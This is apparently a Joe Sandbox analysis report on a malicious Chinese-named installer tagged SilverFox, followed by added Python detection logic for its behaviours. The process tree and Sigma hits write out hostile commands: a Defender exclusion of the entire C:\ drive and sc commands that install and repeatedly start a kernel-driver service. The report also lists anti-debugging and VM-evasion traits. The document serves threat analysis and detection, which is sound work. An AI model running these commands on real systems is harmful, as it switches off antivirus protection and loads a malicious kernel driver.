
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_1.0.9.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_1.0.9.exe (Joe Sandbox escapes non-ASCII file-name characters as #Uxxxx; decoded, the name is 安装助手_1.0.9.exe, Chinese for "Installation Assistant")
renamed because original name is a hash value
Original sample name: _1.0.9.exe
Analysis ID: 1579605
MD5: ff430c30f7b9f0550f6b68dcc709c55b
SHA1: a47d3d79a05d232d45aadd14045765521cfd8431
SHA256: 6a11d0ca2303bffe42e568f32c1adefd70742379ce2639f2ee2a437051ac9c13
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" MD5: FF430C30F7B9F0550F6B68DCC709C55B)
    • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PID: 7320 cmdline: "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 7348 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_1.0.9.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT MD5: FF430C30F7B9F0550F6B68DCC709C55B)
        • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PID: 7656 cmdline: "C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$40272,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 7728 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7828 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 7728 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7692 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7712 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7920 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7936 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7952 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7980 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8040 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8140 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2688 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5772 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3020 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1216 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1748 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3492 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4564 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6368 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3336 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3584 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1188 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7804 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7756 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7392 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7456 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7520 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7356 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7884 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7936 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 824 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5744 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5804 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7052 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2912 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7200 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5436 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4312 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3584 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7620 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7724 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7716 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7400 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7460 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7320, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7348, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7712, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7320, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7348, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7712, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7320, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7348, ProcessName: powershell.exe
No Suricata rule has matched
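The two behaviours the Sigma hits above describe, written out as detection logic a SOC could run over process-creation telemetry. This is an added example, not Joe Sandbox's or the Sigma project's code, and it does not reproduce the referenced Sigma rules verbatim. The events are constructed: most are modelled on the process tree in this report (file names shortened to setup.exe/setup.tmp), and PIDs 9001-9003 are invented to cover the same exclusion delivered via -EncodedCommand and a benign user-mode service that must not alert. base64_offset_variants shows what Sigma's |base64offset modifier expands a string into, which is why a cmdlet name can be matched even when it only ever appears inside a base64 blob; the whole-drive check exists because an exclusion path of 'C:\' switches Defender's scanning off for effectively the entire system.

```python
"""Detection logic for the two Sigma-flagged behaviours in this report, run over
constructed process-creation events.  Added example: not Joe Sandbox or Sigma code."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Subset of Sysmon Event ID 1 / Security 4688 fields the rules need."""
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str
    chain: str          # process ancestry, child first


def utf16_b64(text: str) -> str:
    """Encode text the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def base64_offset_variants(value: bytes) -> list[str]:
    """The three base64 substrings `value` can appear as, one per 3-byte alignment
    (what Sigma's |base64offset modifier expands a string into).  Leading and
    trailing characters that depend on neighbouring bytes are trimmed."""
    starts, ends = (0, 2, 3), (None, -3, -2)
    return [
        base64.b64encode(b" " * i + value).decode("ascii")[starts[i]:ends[(len(value) + i) % 3]]
        for i in range(3)
    ]


PS, SC, CMD = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"C:\Windows\System32\sc.exe", r"C:\Windows\System32\cmd.exe")
TMP = r"C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\setup.tmp"
EXCLUDE_C = "Add-MpPreference -ExclusionPath 'C:\\'"   # the command line seen in this report

# Constructed events modelled on the process tree above; PIDs 9001-9003 are invented.
EVENTS = [
    ProcEvent(7304, 1000, r"C:\Users\user\Desktop\setup.exe", '"setup.exe"'),
    ProcEvent(7320, 7304, TMP, '"setup.tmp" /SL5="$20456,4753292,845824,setup.exe"'),
    ProcEvent(7348, 7320, PS, f'"powershell.exe" -Command "{EXCLUDE_C}"'),
    ProcEvent(7692, 7320, CMD, "cmd /c start sc create CleverSoar type= kernel start= auto"),
    ProcEvent(7712, 7692, SC, 'sc create CleverSoar displayname= CleverSoar binPath= '
                              '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto'),
    ProcEvent(7936, 7920, SC, "sc start CleverSoar"),
    # Same exclusion delivered through -EncodedCommand, so the cmdlet never appears in clear text.
    ProcEvent(9001, 7320, PS, "powershell.exe -nop -w hidden -EncodedCommand " + utf16_b64(EXCLUDE_C)),
    # Benign-looking user-mode service: must not trip the kernel-driver rules.
    ProcEvent(9002, 9000, SC, 'sc create AgentSvc binPath= "C:\\Program Files\\Agent\\agent.exe" start= auto'),
    ProcEvent(9003, 9000, SC, "sc start AgentSvc"),
]

MPPREF_RE = re.compile(r"\b(?:add|set)-mppreference\b", re.I)
EXCLUSION_RE = re.compile(r"-exclusion(?:path|process|extension)\s+['\"]?([^'\"\s,]+)", re.I)
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.I)
DRIVE_ROOT_RE = re.compile(r"[A-Za-z]:\\?")
SC_CREATE_KERNEL_RE = re.compile(r"\bcreate\s+(\S+).*\btype=\s*kernel\b", re.I)
SC_START_RE = re.compile(r"\bstart\s+(\S+)", re.I)
BINPATH_RE = re.compile(r'binpath=\s*"([^"]+)"', re.I)
# Base64 forms of the cmdlet names, ASCII and UTF-16LE, at every alignment.
B64_MPPREF = [v for name in ("Add-MpPreference", "Set-MpPreference")
              for enc in (name.encode("ascii"), name.encode("utf-16-le"))
              for v in base64_offset_variants(enc)]


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the clear-text script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events: list[ProcEvent]) -> list[Finding]:
    by_pid = {e.pid: e for e in events}

    def chain(pid: int) -> str:
        names = []
        while pid in by_pid and len(names) < 16:
            names.append(by_pid[pid].image.rsplit("\\", 1)[-1])
            pid = by_pid[pid].ppid
        return " <- ".join(names)

    findings: list[Finding] = []
    kernel_services: set[str] = set()     # names from "sc create ... type= kernel"
    for e in events:                      # events are assumed to be in time order
        exe = e.image.rsplit("\\", 1)[-1].lower()
        if exe in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(e.cmdline)
            texts = [e.cmdline] + ([decoded] if decoded else [])
            hit = next((t for t in texts if MPPREF_RE.search(t)), None)
            if hit:
                m = EXCLUSION_RE.search(hit)
                value = m.group(1) if m else "?"
                scope = "whole drive" if DRIVE_ROOT_RE.fullmatch(value) else "path/process"
                findings.append(Finding(e.pid, "defender_exclusion_modified", f"{scope}: {value}", chain(e.pid)))
            elif any(v in e.cmdline for v in B64_MPPREF):
                # Cmdlet visible only in base64 form (e.g. an encoding we could not unwrap).
                findings.append(Finding(e.pid, "mppreference_base64", "cmdlet name found in base64", chain(e.pid)))
        elif exe == "sc.exe":
            m = SC_CREATE_KERNEL_RE.search(e.cmdline)
            if m:
                kernel_services.add(m.group(1).lower())
                bp = BINPATH_RE.search(e.cmdline)
                findings.append(Finding(e.pid, "kernel_driver_service_created",
                                        f"{m.group(1)} -> {bp.group(1) if bp else '?'}", chain(e.pid)))
                continue
            m = SC_START_RE.search(e.cmdline)
            if m and m.group(1).lower() in kernel_services:
                findings.append(Finding(e.pid, "kernel_driver_service_started", m.group(1), chain(e.pid)))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}  ({f.chain})")
```

Correlating `sc start` with an earlier `sc create ... type= kernel` is what turns the dozens of `sc start CleverSoar` retries in the tree above into one meaningful alert instead of noise. On a live host, confirm the two findings with `Get-MpPreference` (ExclusionPath) and the service's key under HKLM\SYSTEM\CurrentControlSet\Services before cleanup.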


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 80.5% probability
